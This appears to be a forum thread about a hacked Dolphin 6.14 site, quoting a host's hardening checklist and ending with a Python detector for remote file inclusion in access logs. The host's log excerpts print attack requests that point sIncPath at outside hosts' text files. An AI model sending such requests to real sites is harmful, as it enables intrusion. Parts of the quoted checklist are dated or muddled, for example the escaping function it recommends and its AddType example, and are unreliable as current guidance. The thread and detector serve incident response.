I set up a test site with the free version of Dolphin 6.14 and it has been hacked. It seems that the hackers are using SQL injection: there was a new user set up in the database with the name PJKing, and some new files in the Dolphin root directory, two of which were done.php and dones.php. I only realised this had happened when my hosting company suspended my account because phishing emails had been sent from it.
Also, globals were set to off and all file permissions were set correctly, so I have no idea how this has happened.
Here is a list of 10 things to do to make your site more secure. This was sent to me by my hosting company, but not being a coder I don't understand all of them.
> The programs that operate database-driven sites are vulnerable to hackers, who can (and do) exploit bugs in those programs to gain unauthorized access to your site.
>
> 1. Set register_globals to OFF
> 2. Turn off display of error/warning messages. Set error_display to ZERO
> 3. Never run unescaped queries
> 4. Validate all user inputs: items on forms, in URLs and so on
> 5. Move config files and files containing passwords to MySQL to a secure directory outside of the public_html folder
> 6. Access control: you don't want your users to have access to admin functions or clean-up scripts
> 7. .htaccess is your friend; use it to deny people (we also have an easy deny manager in the cPanel)
> 8. PHP can parse any valid script, whether it is called foo.php, very_long_name.php.php.php, or even willeymtard.bat. Using the default extension of ".php" means that before your hackers start you have already told them you are using PHP. As mentioned, you can use any filename for your scripts; if you are using PHP for every script on your server, consider using the ".html" extension for your scripts and making PHP parse HTML files. You can change your file extension by adding this line to the .htaccess, or turn it on via the AddType handler in the cPanel: (AddType application/x-httpd-php .php)
> 9. To protect against SQL injection attacks: sometimes hackers will try to screw up your database by inserting SQL code into your form input fields. They can, for example, insert code that could delete all the data in your database!
>
> To protect against this, you need to use this PHP function:
> mysql_real_escape_string()
> This function escapes (makes safe) any special characters in a string (programmers call text a 'string') for MySQL.
> Example:
> $name = $_REQUEST['name'];
> $safe_name = mysql_real_escape_string($name);
> Now you know the variable $safe_name, is safe to use with your SQL code.
>
> 10. Keep the PHP code to yourself. If anyone can see it they can exploit vulnerabilities. You should take care to store your PHP files and the necessary passwords to access your MySQL databases in protected files or folders. The easy way to do this is to put the database access passwords in a file with a .inc.php extension (such as config.inc.php), and then place this file in a directory which is above the server's document root (and thus not accessible to surfers of your site), and refer to the file in your PHP code with a require_once command. By doing things this way, your PHP code can read the included file easily, but hackers will find it almost impossible to hack your site.
>
> You can find more information about hardening your PHP scripts at: http://phpsec.org/projects/guide/
>
> Thank you,
>
> HostMonster.Com
cheers
iced
You mentioned register globals; the last time I installed Dolphin for someone at HostMonster, register globals was indeed off by default.
There are some hacks out there that attempt to set globals.
It's a remote possibility that another account holder on the same server has a hack that they gained access
Hello,
I have restored the account from our weekly backups. You were hacked because of the "Dolphin" application being exploited (/ray/modules/global/inc/header.inc.php). The logs of this exploit are below. You will need to update this to the latest version available, or remove the exploitable code.
189.73.227.43
/ray/modules/global/inc/header.inc.php?sIncPath=http://kadin.or.id/mail/id1.txt%3f%3f
Is there any patch available?
It seems to work, but they seem to be trying with
/orca/?sIncPath=http://www.geocities.com/matlima99/test.txt%3f%3f%3f
and
/?sIncPath=http://www.geocities.com/matlima99/test.txt%3f%3f%3f
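The host's log excerpt and the later attempts quoted above all share one signature: a request parameter (here sIncPath) carrying a full http:// URL, which is how a remote file inclusion attempt against an include path looks in an access log. The following Python script is an added example, not code from the thread or from Dolphin; it scans Apache combined-format log lines for that pattern. The sample lines are constructed for the example from the request paths quoted in this thread (only the first client IP comes from the host's excerpt; the other IPs, timestamps and user agents are made up).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed log lines modelled on the request paths quoted in this thread.
SAMPLE_LOG = """\
189.73.227.43 - - [01/Jan/2009:10:00:01 +0000] "GET /ray/modules/global/inc/header.inc.php?sIncPath=http://kadin.or.id/mail/id1.txt%3f%3f HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.5 - - [01/Jan/2009:10:00:02 +0000] "GET /orca/?sIncPath=http://www.geocities.com/matlima99/test.txt%3f%3f%3f HTTP/1.1" 200 2048 "-" "libwww-perl/5.8"
10.0.0.5 - - [01/Jan/2009:10:00:03 +0000] "GET /?sIncPath=http://www.geocities.com/matlima99/test.txt%3f%3f%3f HTTP/1.1" 200 2048 "-" "libwww-perl/5.8"
192.0.2.7 - - [01/Jan/2009:10:00:04 +0000] "GET /index.php?page=profile&id=42 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "method target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A query value that begins with a URL scheme is the remote-inclusion indicator.
SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_rfi_attempts(log_text):
    """Return one record per request whose query string carries a remote URL
    in any parameter, regardless of the parameter name or the script hit."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # parse_qsl percent-decodes, so the %3f padding seen in the thread's
            # log lines shows up here as trailing literal question marks.
            if SCHEME_RE.match(value):
                hits.append({
                    "ip": m.group("ip"),
                    "path": parts.path,
                    "param": name,
                    "remote_url": value.rstrip("?"),
                    "status": int(m.group("status")),
                })
    return hits


def remote_urls_by_ip(hits):
    """Group the fetched URLs by source IP for a quick review before blocking."""
    by_ip = {}
    for h in hits:
        by_ip.setdefault(h["ip"], set()).add(h["remote_url"])
    return by_ip


if __name__ == "__main__":
    for ip, urls in remote_urls_by_ip(find_rfi_attempts(SAMPLE_LOG)).items():
        print(ip, sorted(urls))
```

A 200 status on such a request only says the script ran, not that the remote file was included; whether it was depends on the PHP configuration (allow_url_include/allow_url_fopen) and the include code, so treat every hit as something to verify on the host.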